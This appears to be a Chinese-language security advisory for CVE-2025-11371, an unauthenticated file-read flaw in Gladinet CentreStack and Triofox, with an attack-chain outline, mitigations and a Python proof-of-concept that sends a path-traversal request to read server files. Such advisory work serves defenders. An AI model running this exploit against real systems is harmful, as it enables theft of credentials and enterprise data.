CVE-2025-11371：Gladinet CentreStack和Triofox未认证本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-11371

漏洞类型

本地文件包含（LFI）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Gladinet CentreStack 和 Gladinet Triofox

漏洞概述

CVE-2025-11371是Gladinet CentreStack和Triofox文件共享与协作平台中存在的一个高危本地文件包含（Local File Inclusion，LFI）漏洞。该漏洞存在于产品的默认安装和配置中，允许未经认证的远程攻击者通过精心构造的请求读取服务器上的任意系统文件。

根据CVSS 3.1评分体系，该漏洞评分为7.5分，属于高危级别。攻击者无需任何认证凭据即可利用此漏洞，无需用户交互，且可通过网络远程发起攻击。漏洞的主要影响在于机密性的破坏——攻击者可以读取系统敏感文件，如配置文件、密码文件、数据库连接字符串、私钥等，但不会对系统完整性和可用性造成直接影响。

此漏洞已在野被发现利用（observed in the wild），表明存在实际的攻击活动。Gladinet CentreStack和Triofox作为企业级文件共享和远程访问解决方案，被广泛用于企业IT环境中，一旦遭受攻击，可能导致大量敏感企业数据泄露。受影响版本为所有16.7.10368.56560及之前的版本。该漏洞已被CISA列入已知被利用漏洞目录（KEV），组织应优先处理此漏洞的修复工作。

技术细节

本地文件包含（LFI）漏洞通常发生在Web应用程序未正确验证用户输入的文件路径时，允许攻击者通过操纵文件路径参数来访问服务器上的任意文件。在Gladinet CentreStack和Triofox的默认配置中，存在一个未受保护的端点，该端点接受用户提供的文件路径参数，并将其直接用于文件读取操作，而未进行充分的路径遍历防护或白名单验证。

攻击者可以通过构造包含目录遍历序列（如../）或绝对路径的恶意请求，绕过应用程序的访问控制机制，读取Web根目录之外的系统文件。例如，攻击者可以请求访问/etc/passwd（Linux系统）、C:\Windows\win.ini（Windows系统）等敏感文件，获取系统用户信息或配置详情。

由于该漏洞无需认证即可利用，攻击门槛极低，远程攻击者只需向目标服务器发送特制的HTTP请求即可获取敏感信息。该漏洞的利用已在野被观察到，Huntress安全研究团队已发布相关分析报告。由于CentreStack和Triofox通常部署在企业环境中并存储大量敏感文件，此漏洞可能导致企业核心数据泄露，包括但不限于：用户凭据、加密密钥、数据库配置、Active Directory集成信息等。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过Shodan、Censys等网络空间搜索引擎或资产发现工具，识别暴露在互联网上的Gladinet CentreStack或Triofox实例。这些产品通常运行在443端口（HTTPS）上。

STEP 2

步骤2：漏洞探测

攻击者向目标服务器发送精心构造的HTTP请求，尝试利用本地文件包含漏洞读取系统文件，如通过路径遍历序列访问Windows的win.ini或Linux的/etc/passwd等标志性文件来确认漏洞存在。

STEP 3

步骤3：敏感文件窃取

一旦确认漏洞存在，攻击者利用LFI漏洞读取服务器上的敏感配置文件，包括数据库连接字符串、加密密钥、Active Directory凭据、用户账户信息等关键数据。

STEP 4

步骤4：凭据获取与权限提升

攻击者利用获取的敏感凭据（如管理员密码哈希、API密钥等）进行进一步攻击，可能导致系统权限提升或横向移动到企业内网其他系统。

STEP 5

步骤5：数据泄露与持久化

攻击者可能通过获取的访问权限，窃取存储在CentreStack/Triofox中的企业文件共享数据，并植入后门实现持久化访问，对企业数据安全构成持续威胁。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11371 - Gladinet CentreStack/Triofox Unauthenticated LFI PoC
# Exploits Local File Inclusion to read arbitrary system files
# Affected: All versions <= 16.7.10368.56560

import requests
import sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://target-centrestack.local"
FILE_TO_READ = sys.argv[2] if len(sys.argv) > 2 else "..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"

def exploit_lfi(target, file_path):
    """
    Send unauthenticated request to exploit the LFI vulnerability
    in Gladinet CentreStack/Triofox default installation.
    """
    # Construct the malicious URL with path traversal payload
    url = f"{target}/portal/loginpage.aspx?redirect={file_path}"

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    }

    try:
        response = requests.get(url, headers=headers, timeout=10, verify=False)
        if response.status_code == 200 and len(response.text) > 0:
            print(f"[+] LFI successful! Contents of {file_path}:")
            print("-" * 60)
            print(response.text)
            print("-" * 60)
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET}")
    print(f"[*] Attempting to read: {FILE_TO_READ}")
    exploit_lfi(TARGET, FILE_TO_READ)

影响范围

Gladinet CentreStack <= 16.7.10368.56560

Gladinet Triofox <= 16.7.10368.56560

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）通过防火墙或反向代理限制对CentreStack/Triofox管理端口的互联网访问，仅允许可信IP访问；2）部署WAF规则阻断包含路径遍历特征的HTTP请求；3）监控和审计所有对敏感系统文件的访问尝试；4）审查并修改默认配置，禁用不必要的端点；5）密切关注Huntress和Gladinet官方发布的安全公告，及时应用补丁。